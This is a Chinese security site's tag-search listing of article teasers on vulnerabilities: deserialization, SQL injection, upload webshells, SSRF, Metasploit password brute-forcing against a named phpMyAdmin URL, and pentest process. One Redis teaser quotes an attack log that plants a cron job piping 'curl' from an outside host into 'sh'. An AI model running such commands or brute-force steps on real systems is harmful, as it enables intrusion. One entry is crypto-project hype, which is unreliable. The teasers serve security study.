搜索结果
查询Tags标签: 漏洞,共有 586条记录-
Java反序列化漏洞自动挖掘方法
你说什么最难受,是相爱的人见不了面,还是最爱的人在别人身边。。。---- 网易云热评文章来源:蚂蚁非攻安全实验室 、先知白帽大会 一、序列化与反序列化 1、定义:序列化是用于将对象转换成二进制串存储,对应着 writeObject,反序列正好相反,将二进制串转换成对象,对应…
2021/7/2 17:21:32 人评论 次浏览 -
基础入门-操作系统和数据库
操作系统 1.操作系统判断:Windows对大小写不敏感,Linux敏感使用TTL值判断(不准确)使用nmap判断:nmap -O [IP] 2.简要区别两者的意义 3.操作系统层面漏洞类型对应的意义 4.简要操作系统层面漏洞影响的范围 举例:MS17010 数据库 1.识别数据库类型:(1)常见的代码及对应…
2021/7/1 19:23:14 人评论 次浏览 -
为什么“内存管理”漏洞值得你的绝对关注!
在IT业务环境中,客户数据是关注的焦点。因此,保护客户数据自然是任何IT专业人员最重要的责任。许多国家或组织已经立法要求,数据在静态存储和移动过程中必须为加密状态。这会使许多人觉得如果IT系统符合法律要求,数据就是安全的。实际情况是数据在CPU操作期间依然需要…
2021/7/1 7:23:44 人评论 次浏览 -
让你不再对网络安全产生七种误解
误解一、加密确保了数据得到保护对数据进行加密是保护数据的一个重要环节,但不是绝无差错。Jon Orbeton警告说:如今黑客采用嗅探器可是越来越完善,能够截获SSL和SSL交易信号,窃取经过加密的数据。虽然加密有助于保护遭到窃取的数据被人读取,但加密标准却存在着几个漏…
2021/6/30 23:31:02 人评论 次浏览 -
渗透测试-基础入门-web源码拓展_4
一如既往的学习,一如既往的整理,一如既往的分享 一、前言 web源码在安全测试中是非常重要的信息来源,可以用来代码审计漏洞也可以用来做信息突破口,其中WEB源码有很多技术需要简明分析。 比如:获取ASP源码后可以采用默认数据库下载为突破,获取某其他脚本源码漏洞可…
2021/6/27 22:25:21 人评论 次浏览 -
漏洞系列之——SQL注入
了解SQL注入 漏洞描述漏洞等级漏洞危害漏洞检测方法漏洞利用方法漏洞修复方案SQL注入靶场环境可以参考“热门靶场怕坑练习”的sqli-labs漏洞描述 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在设计程序时,忽略了对输入字符串中夹带的SQL指令的检查,被数据…
2021/6/27 19:20:50 人评论 次浏览 -
Java17 新特性确定,Java之父:终于可以和一个长达25年的漏洞说再见了
Java 17 目前已经进入Rampdown Phase One阶段,所有的功能特性都已经被冻结。这说明Java 17的新特性已经定了,不会再增加新的JEP(JDK增强建议)。之所以关心Java 17是因为和Java 8、Java 11一样它是下一个LTS版本。 发布日程 距离Java 17发布的时间已经越来越近了。Rampdo…
2021/6/21 17:26:36 人评论 次浏览 -
文件上传知识详解
文件上传 大家好,今天给大家更新的是我的文件上传学习笔记,供大家参考,如有不对的地方,望大家多多指正。1.概述 http请求流程图(1)什么是文件上传? 上传漏洞这个顾名思义,就是攻击者通过上传木马文件,直接得到WEBSHELL,危害等级超高,现在的入侵中上传漏洞也是常…
2021/6/20 23:28:48 人评论 次浏览 -
【最新解析】时空梭
【最新解析】时空梭 智能合约技术可确保时空梭及其成员之间进行安全的交互。 时空梭区块链可以扩展交易容量。 所有智能合约交易对于在区块链上进行验证都是透明的。 合同启动后,合同将持续到结束。它是一成不变的。 金融技术的突破性众筹模式。 区块链而非公司上的智能…
2021/6/19 23:59:51 人评论 次浏览 -
【漏洞工具】Metasploit框架爆破模块
MSF - 爆破模块环境http://www.phpstudy.net 查找爆破模块的姿势1、查找服务名 search type:auxiliary ssh2、查找服务器+关键词3、 SSH密码爆破4、Mysql密码爆破5、phpmyadmin登陆验证爆破案例:phpMyAdmin爆破实操 环境http://59.63.200.79:8805/phpmyadmin/
2021/6/19 17:57:10 人评论 次浏览 -
漏洞复现篇——PHP反序列化漏洞
简介 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshe…
2021/6/18 14:56:55 人评论 次浏览 -
[日常] 研究redis未授权访问漏洞利用过程
前提:redis允许远程连接,不需要密码1522057495.583846 [0 123.206.24.121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n" 1522057495.584467 [0 123.206.24.121:50084] "set" "yA" "…
2021/6/17 19:56:01 人评论 次浏览 -
SSRF漏洞
SSRF 漏洞原理漏洞成因攻击方式危害:SSRF的限制:SSRF漏洞绕过方法:利用HTTP基本身份认证的方式绕过 利用302跳转绕过内网IP进制的转换绕过内网IP其他各种指向127.0.0.1的地址 漏洞危害漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造…
2021/6/17 11:01:39 人评论 次浏览 -
渗透测试的流程
确定目标-信息搜集-漏洞检测-漏洞验证-形成报告 一、确定目标。 明确范围:IP 域名 内外网 端口号。 规则:在什么时间进行测试、可以渗透到什么程度、能否提权等? 需求:web应用的漏洞(新上线程序)?业务逻辑漏洞(针对业务的)?人员权限管理漏洞(针对人员、权限) 二…
2021/6/15 18:28:51 人评论 次浏览 -
pikachu之越权漏洞
一、越权漏洞概述 由于没有用户权限进行严格的判断,导致低权限的账号(比如普通用户)可以完成高权限账号(比如超级管理员)范围内的操作 1. 水平越权: A用户和B用户属于同一级别用户,但各自不能操作对方个人信息,A用户如果越权操作B用户的个人信息的情况称为水平越权…
2021/6/12 10:23:55 人评论 次浏览
